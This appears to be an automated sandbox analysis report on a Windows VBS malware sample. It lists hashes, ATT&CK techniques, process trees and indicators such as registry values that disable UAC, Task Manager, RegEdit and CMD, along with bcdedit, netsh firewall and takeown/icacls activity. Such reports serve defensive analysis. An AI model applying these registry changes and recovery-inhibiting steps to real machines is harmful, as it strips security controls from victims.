adb740a4d2814f2fc7078d3a81c9c642cc13e9a77e728483b67e6ca668a2e373

Analysis

max time kernel
300s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2024 19:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malware.vbs
Size

7KB
MD5

9c18843bf13af2e38482ac3fe46f4290
SHA1

cc90dab75e362b455262c5e3b612b5dfb04f0b38
SHA256

adb740a4d2814f2fc7078d3a81c9c642cc13e9a77e728483b67e6ca668a2e373
SHA512

8dd8d17346f421c461ce66ca7c1ac9e75bd1c5628a0fa81dc4c59db1dcc7ab23b31d35f6c492ddfa3d862b67311559f6c2c5e4d923d40fdca94c313f1f53c797
SSDEEP

96:qD/+WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8ELzmdPzWdEKuWP2W9Nukim29mQ2:qD/UqrZgX7xXCdPidfbj2Qr

Score

10^/10

discovery evasion execution exploit persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

5940 bcdedit.exe
5956 bcdedit.exe
5748 bcdedit.exe
396 bcdedit.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

pid	process
5940	bcdedit.exe
5956	bcdedit.exe
5748	bcdedit.exe
396	bcdedit.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

reg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 15 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
2688	netsh.exe
4432	netsh.exe
6140	netsh.exe
3312	netsh.exe
412	netsh.exe
6400	netsh.exe
6152	netsh.exe
2428	netsh.exe
3724	netsh.exe
5796	netsh.exe
6360	netsh.exe
3260	netsh.exe
3856	netsh.exe
5980	netsh.exe
6048	netsh.exe

Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

432 takeown.exe
5588 icacls.exe
6128 takeown.exe
5832 icacls.exe
5724 takeown.exe
5748 icacls.exe
5512 takeown.exe
5488 icacls.exe
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exe

pid process

432 takeown.exe
5588 icacls.exe
6128 takeown.exe
5832 icacls.exe
5724 takeown.exe
5748 icacls.exe
5512 takeown.exe
5488 icacls.exe

pid	process
432	takeown.exe
5588	icacls.exe
6128	takeown.exe
5832	icacls.exe
5724	takeown.exe
5748	icacls.exe
5512	takeown.exe
5488	icacls.exe

pid	process
432	takeown.exe
5588	icacls.exe
6128	takeown.exe
5832	icacls.exe
5724	takeown.exe
5748	icacls.exe
5512	takeown.exe
5488	icacls.exe

Drops file in System32 directory 21 IoCs

Processes:

OpenWith.exeOpenWith.exepowershell.exeOpenWith.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db	OpenWith.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db	OpenWith.exe

Drops file in Windows directory 1 IoCs

Processes:

netsh.exe

description ioc process

File created C:\Windows\rescache\_merged\431186354\3005941989.pri netsh.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

5972 sc.exe
5656 sc.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

6248 powershell.exe
2692 powershell.exe
900 powershell.exe
1880 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

6412 timeout.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\431186354\3005941989.pri	netsh.exe

pid	process
5972	sc.exe
5656	sc.exe

pid	process
6248	powershell.exe
2692	powershell.exe
900	powershell.exe
1880	powershell.exe

pid	process
6412	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exe

pid process

5988 ipconfig.exe
3620 ipconfig.exe
1880 ipconfig.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

6228 taskkill.exe
6348 taskkill.exe
6384 taskkill.exe

pid	process
5988	ipconfig.exe
3620	ipconfig.exe
1880	ipconfig.exe

pid	process
6228	taskkill.exe
6348	taskkill.exe
6384	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exenetsh.exereg.exereg.exereg.exereg.exereg.exeOpenWith.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8\@{Microsoft.Windows.SecureAssessmentBrowser_10.0.19041.1023_neutra = "Take a Test"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@sstpsvc.dll,-35001 = "Secure Socket Tunneling Protocol"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d5acddea4e2414\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a01460c8\@{Microsoft.Windows.NarratorQuickStart_10.0.19041.1023_neutral_neutral_ = "Narrator"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\1d5acddeb9898a7\a01460c8\@{Microsoft.Windows.OOBENetworkCaptivePortal_10.0.19041.1023_neut = "Captive Portal Flow"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5366dd4697d\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2"	reg.exe
Key created	\REGISTRY\USER\S-1-5-18_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8\@{Microsoft.LockApp_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp = "Windows Default Lock Screen"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8\@{Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neut = "Windows Shell Experience"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d5acddee1afafc\a01460c8\@{Microsoft.Windows.Apprep.ChxApp_1000.19041.1023.0_neutral_neutral_cw5n1h2t = "Windows Defender SmartScreen"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\1d5acdde7226641\a01460c8\@{Microsoft.AAD.BrokerPlugin_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy?ms-r = "Work or school account"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wlansvc.dll,-36864 = "WLAN Service - WFD Application Services Platform Coordination Protocol (Uses UDP)"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d7e53665b78b3b\a01460c8\@{Microsoft.Windows.ParentalControls_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy?ms-res = "Microsoft family features"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%systemroot%\system32\provsvc.dll,-202 = "HomeGroup"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8\@{Microsoft.XboxGameCallableUI_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy? = "Xbox Game UI"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableSettingsPage = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\International	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoExplorer = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8\@{Microsoft.AccountsControl_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://M = "Email and accounts"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9002 = "BranchCache - Hosted Cache Server (Uses HTTPS)"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8\@{Microsoft.Win32WebViewHost_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy?ms-reso = "Desktop App Web Viewer"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer"	OpenWith.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri	netsh.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

Processes:

powershell.exemsedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exemsedge.exe

pid	process
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
3080	msedge.exe
3080	msedge.exe
4844	msedge.exe
4844	msedge.exe
5272	identity_helper.exe
5272	identity_helper.exe
900	powershell.exe
900	powershell.exe
900	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
6248	powershell.exe
6248	powershell.exe
6248	powershell.exe
3968	msedge.exe
3968	msedge.exe
2112	msedge.exe
2112	msedge.exe
4724	identity_helper.exe
4724	identity_helper.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exewhoami.exetakeown.exetakeown.exetakeown.exepowershell.exetaskkill.exetaskkill.exetaskkill.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exewhoami.exe

description	pid	process
Token: SeShutdownPrivilege	2508	powercfg.exe
Token: SeCreatePagefilePrivilege	2508	powercfg.exe
Token: SeShutdownPrivilege	5048	powercfg.exe
Token: SeCreatePagefilePrivilege	5048	powercfg.exe
Token: SeShutdownPrivilege	888	powercfg.exe
Token: SeCreatePagefilePrivilege	888	powercfg.exe
Token: SeShutdownPrivilege	2704	powercfg.exe
Token: SeCreatePagefilePrivilege	2704	powercfg.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	3956	whoami.exe
Token: SeTakeOwnershipPrivilege	5724	takeown.exe
Token: SeShutdownPrivilege	6100	powercfg.exe
Token: SeCreatePagefilePrivilege	6100	powercfg.exe
Token: SeShutdownPrivilege	6140	powercfg.exe
Token: SeCreatePagefilePrivilege	6140	powercfg.exe
Token: SeShutdownPrivilege	1572	powercfg.exe
Token: SeCreatePagefilePrivilege	1572	powercfg.exe
Token: SeShutdownPrivilege	4612	powercfg.exe
Token: SeCreatePagefilePrivilege	4612	powercfg.exe
Token: SeDebugPrivilege	900	powershell.exe
Token: SeDebugPrivilege	5356	whoami.exe
Token: SeTakeOwnershipPrivilege	5512	takeown.exe
Token: SeTakeOwnershipPrivilege	432	takeown.exe
Token: SeTakeOwnershipPrivilege	6128	takeown.exe
Token: SeDebugPrivilege	1880	powershell.exe
Token: SeDebugPrivilege	6228	taskkill.exe
Token: SeDebugPrivilege	6348	taskkill.exe
Token: SeDebugPrivilege	6384	taskkill.exe
Token: SeShutdownPrivilege	1840	powercfg.exe
Token: SeCreatePagefilePrivilege	1840	powercfg.exe
Token: SeShutdownPrivilege	3724	powercfg.exe
Token: SeCreatePagefilePrivilege	3724	powercfg.exe
Token: SeShutdownPrivilege	1640	powercfg.exe
Token: SeCreatePagefilePrivilege	1640	powercfg.exe
Token: SeShutdownPrivilege	5024	powercfg.exe
Token: SeCreatePagefilePrivilege	5024	powercfg.exe
Token: SeDebugPrivilege	6248	powershell.exe
Token: SeDebugPrivilege	900	whoami.exe

Suspicious use of FindShellTrayWindow 50 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

msedge.exemsedge.exe

pid	process
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
4844	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe
2112	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exe

pid process

5916 OpenWith.exe
5728 OpenWith.exe
5724 OpenWith.exe

pid	process
5916	OpenWith.exe
5728	OpenWith.exe
5724	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exe

description	pid	process	target process
PID 1896 wrote to memory of 1804	1896	cmd.exe	net.exe
PID 1896 wrote to memory of 1804	1896	cmd.exe	net.exe
PID 1804 wrote to memory of 4780	1804	net.exe	net1.exe
PID 1804 wrote to memory of 4780	1804	net.exe	net1.exe
PID 1896 wrote to memory of 2508	1896	cmd.exe	powercfg.exe
PID 1896 wrote to memory of 2508	1896	cmd.exe	powercfg.exe
PID 1896 wrote to memory of 5048	1896	cmd.exe	powercfg.exe
PID 1896 wrote to memory of 5048	1896	cmd.exe	powercfg.exe
PID 1896 wrote to memory of 888	1896	cmd.exe	powercfg.exe
PID 1896 wrote to memory of 888	1896	cmd.exe	powercfg.exe
PID 1896 wrote to memory of 2704	1896	cmd.exe	powercfg.exe
PID 1896 wrote to memory of 2704	1896	cmd.exe	powercfg.exe
PID 1896 wrote to memory of 2692	1896	cmd.exe	powershell.exe
PID 1896 wrote to memory of 2692	1896	cmd.exe	powershell.exe
PID 1896 wrote to memory of 2428	1896	cmd.exe	netsh.exe
PID 1896 wrote to memory of 2428	1896	cmd.exe	netsh.exe
PID 1896 wrote to memory of 3856	1896	cmd.exe	netsh.exe
PID 1896 wrote to memory of 3856	1896	cmd.exe	netsh.exe
PID 1896 wrote to memory of 2688	1896	cmd.exe	netsh.exe
PID 1896 wrote to memory of 2688	1896	cmd.exe	netsh.exe
PID 1896 wrote to memory of 3724	1896	cmd.exe	netsh.exe
PID 1896 wrote to memory of 3724	1896	cmd.exe	netsh.exe
PID 1896 wrote to memory of 4432	1896	cmd.exe	netsh.exe
PID 1896 wrote to memory of 4432	1896	cmd.exe	netsh.exe
PID 1896 wrote to memory of 2716	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 2716	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4328	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4328	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4476	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 4476	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 2256	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 2256	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 2232	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 2232	1896	cmd.exe	reg.exe
PID 1896 wrote to memory of 3260	1896	cmd.exe	reg.exe
